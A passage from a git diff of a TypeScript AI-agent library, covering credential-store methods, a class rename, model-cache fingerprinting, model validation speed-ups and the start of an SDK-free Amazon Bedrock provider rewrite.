email: refreshed.email ?? target.credential.email, + projectId: refreshed.projectId ?? target.credential.projectId, + enterpriseUrl: refreshed.enterpriseUrl ?? target.credential.enterpriseUrl, + }; + this.#replaceCredentialAt(provider, index, updated); + return { + id, + provider, + credential: { ...updated, refresh: REMOTE_REFRESH_SENTINEL }, + identityKey: resolveCredentialIdentityKey(provider, updated), + }; + } + throw new Error(`No credential with id=${id}`); + } + + /** + * Disable the credential with the given id and emit a + * {@link CredentialDisabledEvent}. Used by the auth-broker server to honour + * `POST /v1/credential/:id/disable`. Returns `false` when no such row exists. + */ + disableCredentialById(id: number, disabledCause: string): boolean { + for (const [provider, entries] of this.#data) { + const index = entries.findIndex(entry => entry.id === id); + if (index === -1) continue; + this.#store.deleteAuthCredential(id, disabledCause); + const next = entries.filter((_value, idx) => idx !== index); + this.#setStoredCredentials(provider, next); + this.#resetProviderAssignments(provider); + this.#emitCredentialDisabled({ provider, disabledCause }); + return true; + } + return false; + } + + /** + * Upsert a credential into the underlying store, refresh the in-memory + * snapshot, and return the redacted snapshot entries for the provider. + * + * Used by the auth-broker server to honour `POST /v1/credential`. The + * persistence layer (`SqliteAuthCredentialStore.upsertAuthCredentialForProvider`) + * does identity-key matching, so re-uploading the same email/account replaces + * the existing row instead of inserting a duplicate. + */ + upsertCredential(provider: string, credential: AuthCredential): AuthCredentialSnapshotEntry[] { + const stored = this.#store.upsertAuthCredentialForProvider(provider, credential); + this.#setStoredCredentials( + provider, + stored.map(entry => ({ id: entry.id, credential: entry.credential })), + ); + this.#resetProviderAssignments(provider); + return stored.map(entry => { + const persisted = entry.credential; + const redacted: SnapshotCredential = + persisted.type === "api_key" ? persisted : { ...persisted, refresh: REMOTE_REFRESH_SENTINEL }; + return { + id: entry.id, + provider: entry.provider, + credential: redacted, + identityKey: resolveCredentialIdentityKey(provider, persisted), + }; + }); + } + + /** + * Describe where the active credential for a provider came from. + * + * Surfaces four layers, highest precedence first: + * 1. Runtime override (`--api-key`). + * 2. Config override (`models.yml` `providers.<name>.apiKey`). + * 3. Stored credential (the one this session is currently sticky to, or the + * one round-robin would pick next when no session id is supplied). + * 4. Env var / fallback resolver — when no stored credential exists. + * + * The string is purely informational; consumers must not parse it. + */ + describeCredentialSource(provider: string, sessionId?: string): string | undefined { + if (this.#runtimeOverrides.has(provider)) { + return "runtime override (--api-key)"; + } + if (this.#configOverrides.has(provider)) { + return "config override (models.yml)"; + } + + const baseLabel = this.#sourceLabel ?? "local store"; + const stored = this.#getStoredCredentials(provider); + if (stored.length === 0) { + if (getEnvApiKey(provider)) return `env ${baseLabel ? `(fallback over ${baseLabel})` : ""}`.trim(); + if (this.#fallbackResolver?.(provider) !== undefined) return `fallback resolver`; + return undefined; + } + + const session = sessionId ? this.#sessionLastCredential.get(provider)?.get(sessionId) : undefined; + // Same selection logic as #selectCredentialByType for "no session" lookups: prefer + // the type with stored credentials, lean OAuth before api_key. We don't run the + // full round-robin here because describing the source shouldn't advance the index. + const preferredType: AuthCredential["type"] = + session?.type ?? (stored.some(entry => entry.credential.type === "oauth") ? "oauth" : "api_key"); + const typed = stored + .map((entry, index) => ({ entry, index })) + .filter(({ entry }) => entry.credential.type === preferredType); + if (typed.length === 0) return baseLabel; + const index = session?.index ?? typed[0].index; + const chosen = stored[index] ?? typed[0].entry; + const credential = chosen.credential; + const identity = + credential.type === "oauth" + ? (credential.email ?? credential.accountId ?? credential.projectId ?? `cred ${chosen.id}`) + : `cred ${chosen.id}`; + return `${baseLabel} · ${preferredType} #${chosen.id} (${identity})`; + } } // ───────────────────────────────────────────────────────────────────────────── -// AuthCredentialStore +// SqliteAuthCredentialStore // ───────────────────────────────────────────────────────────────────────────── /** Row shape for auth_credentials table queries */ @@ -2389,11 +3144,14 @@ function extractOAuthTokenIdentifiers(token: string | undefined): string[] | und } } /** - * Standalone SQLite-backed implementation of AuthCredentialStore interface. - * Used by the pi-ai CLI and as the default store for AuthStorage.create(). - * Also has convenience methods for simple CRUD (saveOAuth, getOAuth, etc.). + * Default SQLite-backed implementation of {@link AuthCredentialStore}. + * + * Used by the pi-ai CLI and as the default store for `AuthStorage.create()`. + * Also exposes convenience methods (`saveOAuth`, `getOAuth`, `saveApiKey`, + * `getApiKey`, `listProviders`, `deleteProvider`) that callers can use directly + * without going through `AuthStorage`. */ -export class AuthCredentialStore { +export class SqliteAuthCredentialStore implements AuthCredentialStore { #db: Database; #listActiveStmt: Statement; #listActiveByProviderStmt: Statement; @@ -2405,6 +3163,7 @@ export class AuthCredentialStore { #deleteByProviderStmt: Statement; #hardDeleteStmt: Statement; #getCacheStmt: Statement; + #getCacheIncludingExpiredStmt: Statement; #upsertCacheStmt: Statement; #deleteExpiredCacheStmt: Statement; #closed = false; @@ -2441,13 +3200,14 @@ export class AuthCredentialStore { this.#getCacheStmt = this.#db.prepare( `SELECT value FROM cache WHERE key = ? AND expires_at > ${SQLITE_NOW_EPOCH}`, ); + this.#getCacheIncludingExpiredStmt = this.#db.prepare("SELECT value FROM cache WHERE key = ?"); this.#upsertCacheStmt = this.#db.prepare( "INSERT INTO cache (key, value, expires_at) VALUES (?, ?, ?) ON CONFLICT(key) DO UPDATE SET value = excluded.value, expires_at = excluded.expires_at", ); this.#deleteExpiredCacheStmt = this.#db.prepare(`DELETE FROM cache WHERE expires_at <= ${SQLITE_NOW_EPOCH}`); } - static async open(dbPath: string = getAgentDbPath()): Promise<AuthCredentialStore> { + static async open(dbPath: string = getAgentDbPath()): Promise<SqliteAuthCredentialStore> { const dir = path.dirname(dbPath); const dirExists = await fs .stat(dir) @@ -2464,7 +3224,7 @@ export class AuthCredentialStore { // Ignore chmod failures (e.g., Windows) } - return new AuthCredentialStore(db); + return new SqliteAuthCredentialStore(db); } #initializeSchema(): void { @@ -2493,7 +3253,7 @@ export class AuthCredentialStore { const schemaVersion = this.#readAuthSchemaVersion() ?? this.#inferAuthSchemaVersion(); const shouldWriteSchemaVersion = schemaVersion <= AUTH_SCHEMA_VERSION; if (schemaVersion > AUTH_SCHEMA_VERSION) { - logger.warn("AuthCredentialStore schema version mismatch", { + logger.warn("SqliteAuthCredentialStore schema version mismatch", { current: schemaVersion, expected: AUTH_SCHEMA_VERSION, }); @@ -2857,9 +3617,10 @@ export class AuthCredentialStore { } } - getCache(key: string): string | null { + getCache(key: string, options?: { includeExpired?: boolean }): string | null { try { - const row = this.#getCacheStmt.get(key) as { value?: string } | undefined; + const stmt = options?.includeExpired === true ? this.#getCacheIncludingExpiredStmt : this.#getCacheStmt; + const row = stmt.get(key) as { value?: string } | undefined; return row?.value ?? null; } catch { return null; @@ -2962,6 +3723,7 @@ export class AuthCredentialStore { this.#deleteByProviderStmt.finalize(); this.#hardDeleteStmt.finalize(); this.#getCacheStmt.finalize(); + this.#getCacheIncludingExpiredStmt.finalize(); this.#upsertCacheStmt.finalize(); this.#deleteExpiredCacheStmt.finalize(); this.#db.close(); diff --git a/packages/ai/src/cli.ts b/packages/ai/src/cli.ts index 0f544ea78..78c1940be 100755 --- a/packages/ai/src/cli.ts +++ b/packages/ai/src/cli.ts @@ -1,6 +1,6 @@ #!/usr/bin/env bun import * as readline from "node:readline"; -import { AuthCredentialStore } from "./auth-storage"; +import { SqliteAuthCredentialStore } from "./auth-storage"; import { getOAuthProviders } from "./utils/oauth"; import type { OAuthCredentials, OAuthProvider } from "./utils/oauth/types"; @@ -60,7 +60,7 @@ async function login(provider: OAuthProvider): Promise<void> { const rl = readline.createInterface({ input: process.stdin, output: process.stdout }); const promptFn = (msg: string) => prompt(rl, `${msg} `); - const storage = await AuthCredentialStore.open(); + const storage = await SqliteAuthCredentialStore.open(); try { let credentials: OAuthCredentials; @@ -387,7 +387,7 @@ Examples: } if (command === "status") { - const storage = await AuthCredentialStore.open(); + const storage = await SqliteAuthCredentialStore.open(); try { const providers = storage.listProviders(); if (providers.length === 0) { @@ -426,7 +426,7 @@ Examples: if (command === "logout") { let provider = args[1] as OAuthProvider | undefined; - const storage = await AuthCredentialStore.open(); + const storage = await SqliteAuthCredentialStore.open(); try { if (!provider) { diff --git a/packages/ai/src/index.ts b/packages/ai/src/index.ts index 89088192a..7d71d9e7e 100644 --- a/packages/ai/src/index.ts +++ b/packages/ai/src/index.ts @@ -1,5 +1,8 @@ export { type ZodType, z } from "zod/v4"; export * from "./api-registry"; +export * from "./auth-broker"; +export { type AuthGatewayBootOptions, type ModelResolver, startAuthGateway } from "./auth-gateway/server"; +export * from "./auth-gateway/types"; export * from "./auth-storage"; export * from "./model-cache"; export * from "./model-manager"; @@ -38,6 +41,13 @@ export * from "./utils/anthropic-auth"; export * from "./utils/discovery"; export * from "./utils/event-stream"; export * from "./utils/h2-fetch"; +export * from "./utils/oauth"; +export type { + OAuthCredentials, + OAuthProvider, + OAuthProviderId, + OAuthProviderInfo, +} from "./utils/oauth/types"; export * from "./utils/overflow"; export * from "./utils/retry"; export * from "./utils/schema"; diff --git a/packages/ai/src/model-cache.ts b/packages/ai/src/model-cache.ts index 192896fe8..0cb3c24ec 100644 --- a/packages/ai/src/model-cache.ts +++ b/packages/ai/src/model-cache.ts @@ -6,13 +6,14 @@ import { Database } from "bun:sqlite"; import { getModelDbPath } from "@oh-my-pi/pi-utils"; import type { Api, Model } from "./types"; -const CACHE_SCHEMA_VERSION = 2; +const CACHE_SCHEMA_VERSION = 3; interface CacheRow { provider_id: string; version: number; updated_at: number; authoritative: number; + static_fingerprint: string; models: string; } @@ -21,6 +22,13 @@ interface CacheEntry<TApi extends Api = Api> { fresh: boolean; authoritative: boolean; updatedAt: number; + /** + * Hash of the static catalog slice that was merged into `models` when this + * row was written. `resolveProviderModels` compares against the current + * static fingerprint and bypasses the static+cache re-merge when they + * match — the cache already incorporates the same static state. + */ + staticFingerprint: string; } let sharedDb: Database | null = null; @@ -43,6 +51,7 @@ function getDb(dbPath?: string): Database { version INTEGER NOT NULL, updated_at INTEGER NOT NULL, authoritative INTEGER NOT NULL DEFAULT 0, + static_fingerprint TEXT NOT NULL DEFAULT '', models TEXT NOT NULL ) `); @@ -71,6 +80,7 @@ export function readModelCache<TApi extends Api>( fresh, authoritative: row.authoritative === 1, updatedAt: row.updated_at, + staticFingerprint: row.static_fingerprint ?? "", }; } catch { return null; @@ -82,14 +92,22 @@ export function writeModelCache<TApi extends Api>( updatedAt: number, models: Model<TApi>[], authoritative: boolean, + staticFingerprint: string, dbPath?: string, ): void { try { const db = getDb(dbPath); db.run( - `INSERT OR REPLACE INTO model_cache (provider_id, version, updated_at, authoritative, models) - VALUES (?, ?, ?, ?, ?)`, - [providerId, CACHE_SCHEMA_VERSION, updatedAt, authoritative ? 1 : 0, JSON.stringify(models)], + `INSERT OR REPLACE INTO model_cache (provider_id, version, updated_at, authoritative, static_fingerprint, models) + VALUES (?, ?, ?, ?, ?, ?)`, + [ + providerId, + CACHE_SCHEMA_VERSION, + updatedAt, + authoritative ? 1 : 0, + staticFingerprint, + JSON.stringify(models), + ], ); } catch { // Cache writes are best-effort; failures should not break model resolution. diff --git a/packages/ai/src/model-manager.ts b/packages/ai/src/model-manager.ts index 277af0798..f88243df1 100644 --- a/packages/ai/src/model-manager.ts +++ b/packages/ai/src/model-manager.ts @@ -75,6 +75,24 @@ export function createModelManager<TApi extends Api = Api, TModelsDevPayload = u }; } +/** + * Cheap fast path for trusted model sources (bundled literals, our own cache rows). + * Skips per-field validation; only guards against catastrophically corrupt rows. + */ +function passModelList<TApi extends Api>(value: unknown): Model<TApi>[] { + if (!Array.isArray(value)) { + return []; + } + const out: Model<TApi>[] = []; + for (const item of value) { + if (item === null || typeof item !== "object" || typeof (item as { id: unknown }).id !== "string") { + continue; + } + out.push(enrichModelThinking(item as Model<TApi>)); + } + return out; +} + /** * Resolves provider models with source precedence: * static -> models.dev -> cache -> dynamic. @@ -88,7 +106,7 @@ export async function resolveProviderModels<TApi extends Api = Api, TModelsDevPa const now = options.now ?? Date.now; const ttlMs = options.cacheTtlMs ?? DEFAULT_CACHE_TTL_MS; const dbPath = options.cacheDbPath; - const staticModels = normalizeModelList<TApi>( + const staticModels = passModelList<TApi>( options.staticModels ?? getBundledModels(options.providerId as GeneratedProvider), ); const cache = readModelCache<TApi>(options.providerId, ttlMs, now, dbPath); @@ -102,6 +120,23 @@ export async function resolveProviderModels<TApi extends Api = Api, TModelsDevPa hasAuthoritativeCache, cacheAgeMs, ); + const staticFingerprint = fingerprintStatic(staticModels); + + // Cold-start fast path: when a fresh, authoritative cache exists, the network + // fetch is skipped, AND the static catalog slice is byte-identical to what + // was merged in last time, the cache row IS the authoritative merge result. + // Re-running `mergeDynamicModels(static, cache)` would just rebuild the same + // objects (~800ms in the steady-state cold-start profile for `omp -p hi`). + if ( + !shouldFetchFromNetwork && + cache?.fresh && + hasAuthoritativeCache && + cache.staticFingerprint === staticFingerprint && + cache.staticFingerprint.length > 0 + ) { + return { models: passModelList<TApi>(cache.models), stale: false }; + } + const [fetchedModelsDevModels, fetchedDynamicModels] = shouldFetchFromNetwork ? await Promise.all([fetchModelsDev(options), dynamicFetcher ? fetchDynamicModels(dynamicFetcher) : null]) : [null, null]; @@ -117,7 +152,7 @@ export async function resolveProviderModels<TApi extends Api = Api, TModelsDevPa if (shouldFetchFromNetwork) { if (dynamicFetchSucceeded) { const snapshotModels = mergeDynamicModels(mergeModelSources(staticModels, modelsDevModels), dynamicModels); - writeModelCache(options.providerId, now(), snapshotModels, true, dbPath); + writeModelCache(options.providerId, now(), snapshotModels, true, staticFingerprint, dbPath); } else { // Dynamic fetch failed — update cache with a non-authoritative snapshot so // stale state remains visible while retry backoff still applies. @@ -130,6 +165,7 @@ export async function resolveProviderModels<TApi extends Api = Api, TModelsDevPa normalizeModelList<TApi>(latestCache?.models ?? cache?.models ?? []), ), false, + staticFingerprint, dbPath, ); } @@ -194,12 +230,16 @@ function shouldFetchRemoteSources( } function mergeModelSources<TApi extends Api>(...sources: readonly (readonly Model<TApi>[])[]): Model<TApi>[] { + // Strip out empty/missing sources up front. The hot path is `(static, [])` + // (modelsDev disabled / failed) — a single non-empty source means we can + // skip the Map churn entirely and just hand back the array. + const nonEmpty = sources.filter(source => source.length > 0); + if (nonEmpty.length === 0) return []; + if (nonEmpty.length === 1) return [...nonEmpty[0]]; const merged = new Map<string, Model<TApi>>(); - for (const source of sources) { + for (const source of nonEmpty) { for (const model of source) { - if (!model?.id) { - continue; - } + if (!model?.id) continue; merged.set(model.id, model); } } @@ -210,6 +250,11 @@ function mergeDynamicModels<TApi extends Api>( baseModels: readonly Model<TApi>[], dynamicModels: readonly Model<TApi>[], ): Model<TApi>[] { + // Empty-side fast paths: `mergeDynamicModels(base, [])` is the common shape + // after we've already merged the first pair, and `(...)` with no base + // happens for providers without static catalogs. + if (dynamicModels.length === 0) return baseModels.length === 0 ? [] : [...baseModels]; + if (baseModels.length === 0) return [...dynamicModels]; const merged = new Map<string, Model<TApi>>(baseModels.map(model => [model.id, model])); for (const dynamicModel of dynamicModels) { if (!dynamicModel?.id) { @@ -225,6 +270,26 @@ function mergeDynamicModels<TApi extends Api>( return Array.from(merged.values()); } +/** + * Stable, low-collision fingerprint of a static catalog slice. Cached by + * reference so repeat calls in the same process (e.g. multiple cold-start + * arms calling `resolveProviderModels` with the same `staticModels` array) + * skip the JSON+hash work after the first call. + */ +const kStaticFingerprint = Symbol("model-manager.staticFingerprint"); +type ModelArrayWithFingerprint = readonly Model<Api>[] & { [kStaticFingerprint]?: string }; +function fingerprintStatic<TApi extends Api>(models: readonly Model<TApi>[]): string { + if (models.length === 0) return "empty"; + const tagged = models as ModelArrayWithFingerprint; + const cached = tagged[kStaticFingerprint]; + if (cached !== undefined) return cached; + // `Bun.hash` returns a `bigint`; base36 keeps the string short for the + // SQLite column without sacrificing distinguishability. + const fingerprint = Bun.hash(JSON.stringify(models)).toString(36); + tagged[kStaticFingerprint] = fingerprint; + return fingerprint; +} + function mergeDynamicModel<TApi extends Api>(existingModel: Model<TApi>, dynamicModel: Model<TApi>): Model<TApi> { const supportsImage = existingModel.input.includes("image") || dynamicModel.input.includes("image"); return enrichModelThinking({ @@ -292,34 +357,49 @@ function isModelLike(value: unknown): value is Model<Api> { if (!isRecord(value)) { return false; } - if (typeof value.id !== "string" || value.id.length === 0) { + const v = value as { + id?: unknown; + name?: unknown; + api?: unknown; + provider?: unknown; + baseUrl?: unknown; + reasoning?: unknown; + input?: unknown; + cost?: unknown; + contextWindow?: unknown; + maxTokens?: unknown; + }; + if (typeof v.id !== "string" || v.id.length === 0) { return false; } - if (typeof value.name !== "string" || value.name.length === 0) { + if (typeof v.name !== "string" || v.name.length === 0) { return false; } - if (typeof value.api !== "string" || value.api.length === 0) { + if (typeof v.api !== "string" || v.api.length === 0) { return false; } - if (typeof value.provider !== "string" || value.provider.length === 0) { + if (typeof v.provider !== "string" || v.provider.length === 0) { return false; } - if (typeof value.baseUrl !== "string" || value.baseUrl.length === 0) { + if (typeof v.baseUrl !== "string" || v.baseUrl.length === 0) { return false; } - if (typeof value.reasoning !== "boolean") { + if (typeof v.reasoning !== "boolean") { return false; } - if (!isModelInputArray(value.input)) { + if (!isModelInputArray(v.input)) { return false; } - if (!isModelCost(value.cost)) { + if (!isModelCost(v.cost)) { return false; } - if (typeof value.contextWindow !== "number" || !Number.isFinite(value.contextWindow) || value.contextWindow <= 0) { + // Finite positive: NaN > 0 is false, +Infinity < Infinity is false. + const cw = v.contextWindow; + if (typeof cw !== "number" || !(cw > 0 && cw < Infinity)) { return false; } - if (typeof value.maxTokens !== "number" || !Number.isFinite(value.maxTokens) || value.maxTokens <= 0) { + const mt = v.maxTokens; + if (typeof mt !== "number" || !(mt > 0 && mt < Infinity)) { return false; } return true; @@ -329,21 +409,42 @@ function isModelInputArray(value: unknown): value is ("text" | "image")[] { if (!Array.isArray(value) || value.length === 0) { return false; } - return value.every(item => item === "text" || item === "image"); + for (let i = 0; i < value.length; i++) { + const item = value[i]; + if (item !== "text" && item !== "image") { + return false; + } + } + return true; } function isModelCost(value: unknown): value is Model<Api>["cost"] { if (!isRecord(value)) { return false; } - return ( - typeof value.input === "number" && - Number.isFinite(value.input) && - typeof value.output === "number" && - Number.isFinite(value.output) && - typeof value.cacheRead === "number" && - Number.isFinite(value.cacheRead) && - typeof value.cacheWrite === "number" && - Number.isFinite(value.cacheWrite) - ); + const c = value as { + input?: unknown; + output?: unknown; + cacheRead?: unknown; + cacheWrite?: unknown; + }; + // Finite (NaN-safe): -Infinity < x < Infinity rejects NaN and both infinities. + // Preserves original behavior: 0 and negatives remain valid. + const ci = c.input; + if (typeof ci !== "number" || !(ci > -Infinity && ci < Infinity)) { + return false; + } + const co = c.output; + if (typeof co !== "number" || !(co > -Infinity && co < Infinity)) { + return false; + } + const cr = c.cacheRead; + if (typeof cr !== "number" || !(cr > -Infinity && cr < Infinity)) { + return false; + } + const cw = c.cacheWrite; + if (typeof cw !== "number" || !(cw > -Infinity && cw < Infinity)) { + return false; + } + return true; } diff --git a/packages/ai/src/model-thinking.ts b/packages/ai/src/model-thinking.ts index 510837693..726a68082 100644 --- a/packages/ai/src/model-thinking.ts +++ b/packages/ai/src/model-thinking.ts @@ -104,6 +104,9 @@ export const CLOUDFLARE_FALLBACK_MODEL: ApiModel<"anthropic-messages"> = { maxTokens: 64000, }; +const kEnrichedModel = Symbol("model-thinking.enrichedModel"); +type ModelWithEnriched = ApiModel<Api> & { [kEnrichedModel]?: ApiModel<Api> }; + /** * Returns a copy of the model with canonical thinking metadata attached. * @@ -111,18 +114,32 @@ export const CLOUDFLARE_FALLBACK_MODEL: ApiModel<"anthropic-messages"> = { * trust `model.thinking` and avoid inferring capabilities on demand. */ export function enrichModelThinking<TApi extends Api>(model: ApiModel<TApi>): ApiModel<TApi> { + const tagged = model as ModelWithEnriched; + const cached = tagged[kEnrichedModel]; + if (cached !== undefined) { + return cached as ApiModel<TApi>; + } const normalizedThinking = normalizeThinkingConfig(model.thinking); + let result: ApiModel<TApi>; if (!model.reasoning) { - return normalizedThinking === undefined && model.thinking === undefined - ? model - : { ...model, thinking: undefined }; + result = + normalizedThinking === undefined && model.thinking === undefined ? model : { ...model, thinking: undefined }; + } else { + const thinking = normalizedThinking ?? inferModelThinking(model); + result = thinkingsEqual(normalizedThinking, thinking) ? model : { ...model, thinking }; } - - const thinking = normalizedThinking ?? inferModelThinking(model); - if (thinkingsEqual(normalizedThinking, thinking)) { - return model; - } - return { ...model, thinking }; + // Stash the enriched copy on a non-enumerable slot so callers that hand us + // the same reference twice skip the work. `enumerable: false` is critical: + // many call sites build derived models via `{ ...model, ...overrides }`, + // which would otherwise copy this cache slot and trick us into returning + // the *original* enriched model — silently discarding the overrides. + Object.defineProperty(tagged, kEnrichedModel, { + value: result, + enumerable: false, + configurable: true, + writable: true, + }); + return result; } /** diff --git a/packages/ai/src/provider-details.ts b/packages/ai/src/provider-details.ts index d775d091f..40a54923f 100644 --- a/packages/ai/src/provider-details.ts +++ b/packages/ai/src/provider-details.ts @@ -16,6 +16,12 @@ export interface ProviderDetailsContext { model: Model<Api>; sessionId?: string; authMode?: string; + /** + * Human-readable description of the active credential, e.g. + * `"broker http://can.internal:8765 · oauth #5 (foo@bar.com)"`. + * Rendered as a `Source` field; omitted when undefined. + */ + credentialSource?: string; preferWebsockets?: boolean; providerSessionState?: Map<string, ProviderSessionState>; } @@ -28,6 +34,9 @@ export function getProviderDetails(context: ProviderDetailsContext): ProviderDet { label: "Auth", value: context.authMode ?? "auto" }, { label: "Endpoint", value: endpoint }, ]; + if (context.credentialSource) { + fields.push({ label: "Source", value: context.credentialSource }); + } if (context.model.api === "openai-codex-responses") { const codexDetails = getOpenAICodexTransportDetails(context.model as Model<"openai-codex-responses">, { diff --git a/packages/ai/src/provider-models/special.ts b/packages/ai/src/provider-models/special.ts index da48eacb3..283ea62f2 100644 --- a/packages/ai/src/provider-models/special.ts +++ b/packages/ai/src/provider-models/special.ts @@ -1,6 +1,6 @@ +import { once } from "@oh-my-pi/pi-utils"; import type { ModelManagerOptions } from "../model-manager"; import { fetchCodexModels } from "../utils/discovery/codex"; -import { fetchCursorUsableModels } from "../utils/discovery/cursor"; // --------------------------------------------------------------------------- // OpenAI Codex @@ -45,55 +45,16 @@ export function cursorModelManagerOptions(config: CursorModelManagerConfig = {}) providerId: "cursor", ...(apiKey ? { - fetchDynamicModels: () => fetchCursorUsableModels({ apiKey, baseUrl, clientVersion }), + fetchDynamicModels: async () => { + const { fetchCursorUsableModels } = await cursorDiscovery(); + return fetchCursorUsableModels({ apiKey, baseUrl, clientVersion }); + }, } : undefined), }; } -// --------------------------------------------------------------------------- -// Amazon Bedrock -// --------------------------------------------------------------------------- - -// Dynamic discovery requires AWS SDK auth (ListFoundationModels). Not yet implemented. - -export interface AmazonBedrockModelManagerConfig {} - -export function amazonBedrockModelManagerOptions( - _config: AmazonBedrockModelManagerConfig = {}, -): ModelManagerOptions<"bedrock-converse-stream"> { - return { providerId: "amazon-bedrock" }; -} - -// --------------------------------------------------------------------------- -// MiniMax variants (subscription-based, no model listing endpoint) -// --------------------------------------------------------------------------- - -export interface MinimaxModelManagerConfig {} - -export function minimaxModelManagerOptions( - _config: MinimaxModelManagerConfig = {}, -): ModelManagerOptions<"anthropic-messages"> { - return { providerId: "minimax" }; -} - -export function minimaxCnModelManagerOptions( - _config: MinimaxModelManagerConfig = {}, -): ModelManagerOptions<"anthropic-messages"> { - return { providerId: "minimax-cn" }; -} - -export function minimaxCodeModelManagerOptions( - _config: MinimaxModelManagerConfig = {}, -): ModelManagerOptions<"openai-completions"> { - return { providerId: "minimax-code" }; -} - -export function minimaxCodeCnModelManagerOptions( - _config: MinimaxModelManagerConfig = {}, -): ModelManagerOptions<"openai-completions"> { - return { providerId: "minimax-code-cn" }; -} +const cursorDiscovery = once(() => import("../utils/discovery/cursor")); // --------------------------------------------------------------------------- // Zai diff --git a/packages/ai/src/providers/amazon-bedrock.ts b/packages/ai/src/providers/amazon-bedrock.ts index 880e623d0..0598c573f 100644 --- a/packages/ai/src/providers/amazon-bedrock.ts +++ b/packages/ai/src/providers/amazon-bedrock.ts @@ -1,28 +1,13 @@ -import { - BedrockRuntimeClient, - type BedrockRuntimeClientConfig, - StopReason as BedrockStopReason, - type Tool as BedrockTool, - CachePointType, - CacheTTL, - type ContentBlock, - type ContentBlockDeltaEvent, - type ContentBlockStartEvent, - type ContentBlockStopEvent, - ConversationRole, - ConverseStreamCommand, - type ConverseStreamMetadataEvent, - ImageFormat, - type Message, - type SystemContentBlock, - type ToolChoice, - type ToolConfiguration, - ToolResultStatus, -} from "@aws-sdk/client-bedrock-runtime"; -import { type DefaultProviderInit, defaultProvider } from "@aws-sdk/credential-provider-node"; -import { $env, $flag } from "@oh-my-pi/pi-utils"; -import { NodeHttpHandler } from "@smithy/node-http-handler"; -import { ProxyAgent } from "proxy-agent"; +/** + * Amazon Bedrock Converse Stream provider. + * + * Talks directly to `bedrock-runtime.{region}.amazonaws.com` over HTTPS with + * SigV4 signing and decodes the `application/vnd.amazon.eventstream` response. + * No `@aws-sdk/*`, no `@smithy/*`, no `proxy-agent`. Proxies are honored via + * Bun's native `HTTPS_PROXY` support. + */ + +import { $env, $flag, fetchWithRetry } from "@oh-my-pi/pi-utils"; import type { Effort } from "../model-thinking"; import { mapEffortToAnthropicAdaptiveEffort, requireSupportedEffort } from "../model-thinking"; import { calculateCost } from "../models"; @@ -47,6 +32,9 @@ import { AssistantMessageEventStream } from "../utils/event-stream"; import { appendRawHttpRequestDumpFor400, type RawHttpRequestDump, withHttpStatus } from "../utils/http-inspector"; import { parseStreamingJson } from "../utils/json-parse"; import { toolWireSchema } from "../utils/schema/wire"; +import { resolveAwsCredentials } from "./aws-credentials"; +import { decodeEventStream } from "./aws-eventstream"; +import { signRequest } from "./aws-sigv4"; import { transformMessages } from "./transform-messages"; export interface BedrockOptions extends StreamOptions { @@ -63,49 +51,93 @@ export interface BedrockOptions extends StreamOptions { type Block = (TextContent | ThinkingContent | ToolCall) & { index?: number; partialJson?: string }; -const BEDROCK_PROXY_ENV_KEYS = ["HTTPS_PROXY", "HTTP_PROXY", "ALL_PROXY", "https_proxy", "http_proxy", "all_proxy"]; +// ---------- Bedrock wire-format types ---------- +// Mirrors only what we actually consume from `ConverseStreamRequest` / +// `ConverseStreamOutput`. Keeps us decoupled from `@aws-sdk/client-bedrock-runtime`. -function hasBedrockProxyEnvironment(): boolean { - return BEDROCK_PROXY_ENV_KEYS.some(key => Boolean($env[key]?.trim())); +interface CachePoint { + cachePoint: { type: "default"; ttl?: "5m" | "1h" }; +} +interface TextBlockWire { + text: string; +} +interface ImageBlockWire { + image: { format: "jpeg" | "png" | "gif" | "webp"; source: { bytes: string } }; +} +interface ToolUseBlockWire { + toolUse: { toolUseId: string; name: string; input: unknown }; +} +interface ToolResultBlockWire { + toolResult: { + toolUseId: string; + content: Array<TextBlockWire | ImageBlockWire>; + status: "success" | "error"; + }; +} +interface ReasoningBlockWire { + reasoningContent: { reasoningText: { text: string; signature?: string } }; } -function installBedrockHttp1Transport(config: BedrockRuntimeClientConfig): void { - const requestHandler = createBedrockHttp1RequestHandler(); - config.requestHandler = requestHandler; +type UserContent = TextBlockWire | ImageBlockWire | ToolResultBlockWire | CachePoint; +type AssistantContent = TextBlockWire | ToolUseBlockWire | ReasoningBlockWire; +type SystemContent = TextBlockWire | CachePoint; - if (hasBedrockProxyEnvironment()) { - config.credentialDefaultProvider = createBedrockCredentialDefaultProvider(requestHandler); - } +interface WireMessage { + role: "user" | "assistant"; + content: Array<UserContent | AssistantContent>; } -function createBedrockHttp1RequestHandler(): NodeHttpHandler { - if (!hasBedrockProxyEnvironment()) { - return new NodeHttpHandler(); - } - - const agent = new ProxyAgent(); - return new NodeHttpHandler({ - httpAgent: agent, - httpsAgent: agent, - }); +interface WireToolSpec { + toolSpec: { name: string; description: string; inputSchema: { json: unknown } }; +} +interface WireToolChoice { + auto?: Record<string, never>; + any?: Record<string, never>; + tool?: { name: string }; +} +interface WireToolConfig { + tools: WireToolSpec[]; + toolChoice?: WireToolChoice; } -function createBedrockCredentialDefaultProvider( - requestHandler: NodeHttpHandler, -): NonNullable<BedrockRuntimeClientConfig["credentialDefaultProvider"]> { - return (init?: DefaultProviderInit) => - defaultProvider({ - ...init, - clientConfig: { - ...init?.clientConfig, - requestHandler, - }, - }); +interface ConverseStreamRequest { + messages: WireMessage[]; + system?: SystemContent[]; + inferenceConfig?: { maxTokens?: number; temperature?: number; topP?: number }; + toolConfig?: WireToolConfig; + additionalModelRequestFields?: Record<string, unknown>; } -function isHttp2ResponseError(error: unknown): boolean { - const message = error instanceof Error ? error.message : String(error); - return /\bhttp2\b|http\/2/i.test(message); +// Streaming events (snake_case matches the JSON envelope key, but Bedrock uses camelCase). +interface MessageStartEvent { + role: "user" | "assistant"; +} +interface ContentBlockStartEvent { + contentBlockIndex: number; + start?: { toolUse?: { toolUseId?: string; name?: string } }; +} +interface ContentBlockDeltaEvent { + contentBlockIndex: number; + delta?: { + text?: string; + toolUse?: { input?: string }; + reasoningContent?: { text?: string; signature?: string }; + }; +} +interface ContentBlockStopEvent { + contentBlockIndex: number; +} +interface MessageStopEvent { + stopReason?: string; +} +interface MetadataEvent { + usage?: { + inputTokens?: number; + outputTokens?: number; + cacheReadInputTokens?: number; + cacheWriteInputTokens?: number; + totalTokens?: number; + }; } export const streamBedrock: StreamFunction<"bedrock-converse-stream"> = ( @@ -139,37 +171,10 @@ export const streamBedrock: StreamFunction<"bedrock-converse-stream"> = ( const blocks = output.content as Block[]; let rawRequestDump: RawHttpRequestDump | undefined; - - const config: BedrockRuntimeClientConfig = { - region: options.region, - profile: options.profile, - }; - let usesHttp1RequestHandler = false; - let messageStarted = 